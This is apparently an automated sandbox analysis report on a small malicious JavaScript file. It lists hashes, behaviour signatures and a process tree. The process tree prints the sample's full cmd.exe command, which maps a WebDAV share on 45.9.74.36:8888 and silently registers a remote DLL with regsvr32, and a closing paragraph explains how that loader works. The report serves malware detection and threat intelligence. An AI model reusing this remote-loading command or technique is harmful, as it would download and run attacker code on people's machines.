Analysis

max time kernel: 136s
max time network: 125s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23/07/2024, 02:14
Static task: static1

Behavioral task: behavioral1
  Sample: 459218370446121433.js
  Resource: win7-20240708-en

Behavioral task: behavioral2
  Sample: 459218370446121433.js
  Resource: win10v2004-20240709-en
General

Target: 459218370446121433.js
Size: 5KB
MD5: d8c4529a4f1db13819e670d2a913c7bd
SHA1: 300a1948006261f19afa6547cb89f2170f6d5296
SHA256: 83a34d7d1ddce6af24d568f85bd113fbe88708b81f402d5821eaf100120e3e1d
SHA512: ba7cc27c796347e8ca866386355594552a434b7a81c5e4d9c7aabbc52a97e7f7465ae69345189476cb280c1954cff13f894ab200a0504992d85fe626244e2d32
SSDEEP: 96:u5BwDXfVyX94cVNs7aqlAq4JnAkzKaH4Jng:uHw7VyX94WNs7tlAq4nAkzKaH4ng
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
  Process: wscript.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe
net use is invoked from the cmd.exe child to map a WebDAV share on 45.9.74.36:8888 (see Processes).

Suspicious use of WriteProcessMemory (4 IoCs)
  description                         | pid  | Process     | procid_target
  PID 2876 wrote to memory of 3668    | 2876 | wscript.exe | 85
  PID 2876 wrote to memory of 3668    | 2876 | wscript.exe | 85
  PID 3668 wrote to memory of 3584    | 3668 | cmd.exe     | 87
  PID 3668 wrote to memory of 3584    | 3668 | cmd.exe     | 87
Processes

1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\459218370446121433.js
   PID: 2876
   Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe (child of PID 2876)
      Command line: "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\31400226922294.dll
      PID: 3668
      Signatures: Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\net.exe (child of PID 3584's parent, PID 3668)
         Command line: net use \\45.9.74.36@8888\davwwwroot\
         PID: 3584

The cmd.exe command line is a WebDAV loader: the \\host@port\davwwwroot\ form is the Windows WebClient UNC syntax, so `net use` mounts an HTTP WebDAV share on 45.9.74.36 port 8888, and the `&&` then hands a DLL served from that share to `regsvr32 /s` for silent registration (DllRegisterServer execution). Only the net.exe child is present in the recorded tree; no regsvr32.exe process appears in this report.